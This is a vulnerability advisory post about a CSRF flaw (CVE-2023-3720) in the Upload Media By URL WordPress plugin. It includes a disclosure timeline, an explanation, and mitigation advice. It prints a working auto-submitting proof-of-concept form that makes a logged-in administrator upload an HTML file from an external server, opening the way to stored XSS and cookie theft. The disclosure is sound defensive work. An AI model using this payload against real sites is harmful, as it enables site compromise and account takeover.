During a thorough security assessment of the Upload Media By URL plugin for WordPress, a concerning medium-level vulnerability has been uncovered in versions prior to 1.0.8. This vulnerability poses a significant risk to your website’s security and calls for immediate action! If exploited, this vulnerability allows attackers to potentially upload files containing malicious code directly to your WordPress site, exposing your users to harmful scripts and attacks.
Main info:
CVE | CVE-2023-3720 |
Plugin | Upload Media By URL |
Critical | Medium |
Publicly Published | August 2, 2023 |
Last Updated | August 2, 2023 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A2: Broken Authentication and Session Management |
PoC | Yes |
Exploit | Will be later |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720 https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954 |
Plugin Security Certification by CleanTalk |
Timeline
July 10, 2023 | Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed |
July 10, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
July 17, 2023 | The author has eliminated the vulnerability and patched his plugin |
August 2, 2023 | Registered CVE-2023-3720 |
Discovery of the Vulnerability
During a security assessment of the Upload Media By URL plugin for WordPress, a medium vulnerability was identified in versions prior to 1.0.8. The plugin lacked Cross-Site Request Forgery (CSRF) protection when handling file uploads, allowing attackers to trick logged-in administrators into uploading files on their behalf, including HTML files containing malicious JavaScript code that could execute when accessed by users with the unfiltered_html capability.
Understanding Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. In this case, attackers can exploit the absence of CSRF protection in the Upload Media By URL plugin to create a crafted HTML file hosted on an external server. If a privileged user, such as an administrator, unknowingly accesses the external link, the malicious HTML file can trigger the upload of harmful files onto the WordPress system.
Exploiting the Cross-Site Request Forgery (CSRF) vulnerability
By crafting a malicious HTML file that includes a CSRF payload, attackers can entice administrators with upload privileges to visit the external link. Once the link is accessed, the malicious file exploits the lack of CSRF protection in the plugin to perform unauthorized actions, effectively tricking the administrator into uploading harmful files to the WordPress site.
POC code:
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://your_site/wordpress/wp-admin/upload.php” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”multiurl” value=”http://your_external_server/123.html” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Potential Risks and Real-World Impact
The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:
- Stored Cross-Site Scripting (XSS) Attacks::
Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users accessing the affected pages, and potentially exposing sensitive data or credentials.In almost all cases , Stored XSS is used to steal cookies , thereby Account Takeover. - Malware Distribution:
Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website. - Unauthorized Content Injection:
Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site’s reputation, or defacing it with inappropriate or harmful materials. - Social Engineering Exploits:
Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.
Recommendations for Improved Security
To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:
- Immediate Plugin Update:
Website administrators should update the Upload Media By URL plugin to the latest version, which includes CSRF protection and patches this vulnerability. - Implement CSRF Protection:
Plugin developers should include robust CSRF protection mechanisms when processing sensitive actions, such as file uploads, to prevent unauthorized access. - Regular Security Audits:
Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively. - User Privilege Restriction:
Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions. - User Awareness:
Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
By addressing the CSRF vulnerability in the Upload Media By URL plugin and implementing these security recommendations, website owners can significantly reduce the likelihood of security breaches, protect their site’s integrity, and safeguard against social engineering exploits.
Use CleanTalk solutions to improve the security of your website
Dmitrii i.
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
Leave a Reply